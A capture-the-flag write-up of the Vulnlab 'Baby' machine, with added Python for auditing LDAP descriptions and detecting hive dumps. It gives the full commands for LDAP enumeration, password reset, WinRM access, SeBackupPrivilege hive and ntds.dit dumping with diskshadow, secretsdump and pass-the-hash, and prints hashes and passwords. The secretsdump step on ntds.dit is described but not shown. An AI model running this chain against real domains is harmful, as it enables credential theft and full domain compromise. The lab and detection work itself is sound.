Baby is an Easy Windows machine from Vulnlab. We start with ldapsearch and find a user's password in an account description; after resetting that user's password we can log in over WinRM. SeBackupPrivilege is enabled for that user, so we dump the SAM and SYSTEM hives from the machine.
```
➜ Baby nmap -v -Pn 10.10.96.24
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-08 06:35 EDT
Initiating Parallel DNS resolution of 1 host. at 06:35
Completed Parallel DNS resolution of 1 host. at 06:35, 0.00s elapsed
Initiating SYN Stealth Scan at 06:35
Scanning 10.10.96.24 [1000 ports]
Discovered open port 139/tcp on 10.10.96.24
Discovered open port 135/tcp on 10.10.96.24
Discovered open port 3389/tcp on 10.10.96.24
Discovered open port 53/tcp on 10.10.96.24
Discovered open port 445/tcp on 10.10.96.24
Discovered open port 464/tcp on 10.10.96.24
Discovered open port 636/tcp on 10.10.96.24
Discovered open port 5357/tcp on 10.10.96.24
Discovered open port 389/tcp on 10.10.96.24
Discovered open port 593/tcp on 10.10.96.24
Discovered open port 3268/tcp on 10.10.96.24
Discovered open port 88/tcp on 10.10.96.24
Discovered open port 3269/tcp on 10.10.96.24
Completed SYN Stealth Scan at 06:35, 8.44s elapsed (1000 total ports)
Nmap scan report for 10.10.96.24
Host is up (0.16s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server
5357/tcp open  wsdapi

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 8.52 seconds
           Raw packets sent: 1990 (87.560KB) | Rcvd: 16 (704B)
➜ Baby
```
Ldapsearch
Ldapsearch performs an anonymous LDAP query to the LDAP server at 10.10.96.24, searching for all available objects under the domain baby.vl.
By grepping for “pass” in the output, we found a description revealing an initial password:
```
➜ Baby cat ldap_out | grep pass
description: Members in this group can have their passwords replicated to all
description: Members in this group cannot have their passwords replicated to a
description: Set initial password to `BabyStart123!`
```
Pass: BabyStart123!
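The truncated description lines above are an artefact of LDIF line folding: ldapsearch wraps long values onto continuation lines, and `grep` only shows the first physical line. As an added example (not part of the original writeup), the following Python unfolds the LDIF properly and audits description fields for credential-like text, which is the check a defender would run over their own directory; the sample LDIF, DNs and user names are constructed.

```python
"""Audit LDAP descriptions for leaked credentials after unfolding LDIF.
Added example, not from the original writeup; sample data is constructed."""
import re

# ldapsearch folds values longer than 76 columns onto continuation lines
# that start with one space, so `grep pass` only sees the first physical
# line of each value (hence the cut-off descriptions in the writeup).
SAMPLE_LDIF = """\
dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
description: Members in this group can have their passwords replicated to all
  read-only domain controllers in the domain

dn: CN=Example.User,OU=it,DC=baby,DC=vl
description: Set initial password to `BabyStart123!`

dn: CN=Other.User,OU=it,DC=baby,DC=vl
description: Helpdesk lead, passes on escalations
"""

# Matches "password to X", "pwd: X", "passwd = X"; unlike `grep pass` it
# ignores "passwords replicated ..." and "passes ...".
LEAK_PATTERN = re.compile(
    r"(?i)\b(?:initial\s+)?pass(?:word|wd)?\s*(?:is|to|[:=])\s*\S+")


def unfold_ldif(text):
    """Parse LDIF into a list of {attribute: [values]} dicts: joins folded
    lines, skips '#' comments, blank lines separate entries."""
    logical = []
    for raw in text.splitlines():
        if raw.startswith(" ") and logical:       # continuation line
            logical[-1] += raw[1:]
        else:
            logical.append(raw)
    entries, current = [], {}
    for line in logical + [""]:                   # sentinel flushes last entry
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
        elif not line.startswith("#"):
            attr, _, value = line.partition(":")
            current.setdefault(attr.strip(), []).append(value.strip())
    return entries


def find_password_descriptions(entries):
    """Return (dn, description) pairs whose description looks like a credential."""
    return [(e.get("dn", ["?"])[0], d)
            for e in entries for d in e.get("description", [])
            if LEAK_PATTERN.search(d)]
```

Base64-encoded `attr::` values are left encoded by this parser; decode them before matching if your export contains any.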
With a candidate password in hand, I checked whether it worked for any user. Using CME (CrackMapExec), BabyStart123! was valid for Caroline.Robinson, but the account was flagged as requiring a password change. Using smbpasswd, I set a new password of Sebin#321.
```
➜ Baby smbpasswd -r 10.10.96.24 -U Caroline.Robinson
Old SMB password: BabyStart123!
New SMB password: Sebin#321
Retype new SMB password: Sebin#321
Password changed for user Caroline.Robinson
➜ Vulnlab
```
```
➜ Baby evil-winrm -i 10.10.96.24 -u Caroline.Robinson -p 'Sebin#321'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> dir

    Directory: C:\Users\Caroline.Robinson\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/21/2016   3:36 PM            527 EC2 Feedback.website
-a----        6/21/2016   3:36 PM            554 EC2 Microsoft Windows Guide.website
-a----       11/21/2021   3:24 PM             36 user.txt

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> type user.txt
VL{b2c6150b85125xxxxxxxxb253df9540d898}
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop>

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> cd c:\
```
Caroline.Robinson holds SeBackupPrivilege, which lets a process read and back up any file on the system regardless of its ACL, including the SAM and SYSTEM registry hives. Those hives contain the local account password hashes, which can be extracted offline for privilege escalation. Using this privilege, we saved both hives with reg save and downloaded them.
```
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> cd c:\
*Evil-WinRM* PS C:\> mkdir Temp

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        10/8/2024  10:59 AM                Temp

*Evil-WinRM* PS C:\>
*Evil-WinRM* PS C:\> reg save hklm\sam c:\Temp\sam
The operation completed successfully.
*Evil-WinRM* PS C:\> reg save hklm\system c:\Temp\system
The operation completed successfully.
*Evil-WinRM* PS C:\temp> download system
Info: Downloading C:\temp\system to system
Info: Download successful!
*Evil-WinRM* PS C:\Temp> download sam
Info: Downloading C:\Temp\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Temp>
```
After downloading the SAM and SYSTEM hives, we used impacket-secretsdump to extract password hashes. We successfully retrieved the NTLM hash for the Administrator account, which can be used for further privilege escalation.
```
➜ Baby impacket-secretsdump -sam sam -system system local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
➜ Baby
```
The extracted NTLM hash belongs to the local Administrator account, which means it won’t work for domain authentication. To gain access as a Domain Admin, we need to dump the ntds.dit file, which contains all domain user hashes. Since we have SeBackupPrivilege, we can leverage it to extract the NTDS database and escalate further.
```
➜ Baby evil-winrm -i 10.10.96.24 -u Administrator -H 8d992faed38128ae85e95fa35868bb43

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1
➜ Baby
```
Understanding Local vs. Domain NT Hashes in Windows Authentication
When dumping hashes from a Windows machine, you may extract credentials from two sources: SAM (Security Account Manager) and NTDS.dit (Active Directory database). While both contain NT hashes, they serve different authentication purposes.
SAM Hashes: Stored locally and used for non-domain accounts. These hashes cannot be used for domain authentication.
NTDS.dit Hashes: Contain credentials for Active Directory users. These hashes can be used for Pass-the-Hash (PtH) attacks on domain-joined machines.
If you can’t authenticate using a SAM-extracted hash but succeed with an NTDS.dit hash, it’s because domain authentication requires the NTDS.dit hash, while SAM hashes are only valid for local logins.
This diskshadow script creates a persistent, no-writers shadow copy of the C: drive and exposes it as Z:, so files that are locked while in use, such as ntds.dit, can be copied from the snapshot. The unix2dos command converts the script from Unix line endings to DOS/Windows line endings (LF → CRLF), so that diskshadow parses it correctly once it is transferred to the Windows host.
```
➜ Baby unix2dos seb.dsh
unix2dos: converting file seb.dsh to DOS format...
➜ Baby cat seb.dsh
set context persistent nowriters
add volume c: alias seb
create
expose %seb% z:
➜ Baby
```
After running the script with DiskShadow, we successfully exposed the C: drive as Z: and retrieved the ntds.dit file, which contains Active Directory password hashes.
```
*Evil-WinRM* PS C:\Temp> ls

    Directory: C:\Temp

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/8/2024  11:17 AM            613 2024-10-08_11-17-52_BABYDC.cab
-a----        10/8/2024  10:33 AM       16777216 ntds.dit
-a----        10/8/2024  11:00 AM          49152 sam
-a----        10/8/2024  11:17 AM             84 seb.dsh
-a----        10/8/2024  11:00 AM       16633856 system

*Evil-WinRM* PS C:\Temp> download ntds.dit
Info: Downloading C:\Temp\ntds.dit to ntds.dit
Info: Download successful!
*Evil-WinRM* PS C:\Temp>
```
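From the defender's side, both steps of this chain, the reg save of the SAM and SYSTEM hives and the scripted diskshadow run that exposed the volume, show up as plain process command lines. As an added example (not from the original writeup), the following Python runs two rules over constructed process-creation events and groups hits per account; the event field names (user, parent, cmd) are assumptions rather than a real log schema.

```python
"""Flag the SeBackupPrivilege abuse steps from this writeup (reg save of the
SAM/SYSTEM hives, scripted diskshadow) in process-creation telemetry.
Added example, not from the original post; events are constructed and the
field names (user, parent, cmd) are assumptions, not a real log schema."""
import re

# Constructed events in the spirit of Security 4688 / Sysmon EID 1 records.
# wsmprovhost.exe is the WinRM host process, i.e. an Evil-WinRM session.
SAMPLE_EVENTS = [
    {"user": "BABY\\Caroline.Robinson", "parent": "wsmprovhost.exe",
     "cmd": "reg save hklm\\sam c:\\Temp\\sam"},
    {"user": "BABY\\Caroline.Robinson", "parent": "wsmprovhost.exe",
     "cmd": "reg save hklm\\system c:\\Temp\\system"},
    {"user": "BABY\\Caroline.Robinson", "parent": "wsmprovhost.exe",
     "cmd": "diskshadow /s C:\\Temp\\seb.dsh"},
    {"user": "NT AUTHORITY\\SYSTEM", "parent": "services.exe",
     "cmd": "reg save HKLM\\Software\\Contoso\\Config C:\\backup\\cfg.hiv"},
    {"user": "BABY\\svc_backup", "parent": "wbengine.exe",
     "cmd": "vssadmin list shadows"},
]

# Only the credential-bearing hives count; other reg save targets are noise.
RULES = [
    ("sam_system_hive_save",
     re.compile(r"(?i)\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b")),
    ("diskshadow_scripted",
     re.compile(r"(?i)\bdiskshadow(?:\.exe)?\b.*\s/s\b")),
]


def detect(events):
    """Return one alert per (event, rule) match, noting WinRM-spawned shells."""
    alerts = []
    for ev in events:
        for name, pattern in RULES:
            if pattern.search(ev["cmd"]):
                alerts.append({
                    "rule": name, "user": ev["user"], "cmd": ev["cmd"],
                    "remote_shell": ev["parent"].lower() == "wsmprovhost.exe",
                })
    return alerts


def chain_by_user(alerts):
    """Map user -> set of rule names; both rules from one account is the
    hive-dump-then-shadow-copy pattern this writeup follows."""
    chains = {}
    for alert in alerts:
        chains.setdefault(alert["user"], set()).add(alert["rule"])
    return chains
```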
Using impacket-secretsdump against the downloaded ntds.dit together with the SYSTEM hive, we can dump both the domain and the local hashes.
```
➜ Baby evil-winrm -i 10.10.96.24 -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
```
With the extracted NTLM hash, we successfully authenticated as the Administrator using Evil-WinRM, gaining full access to the target machine.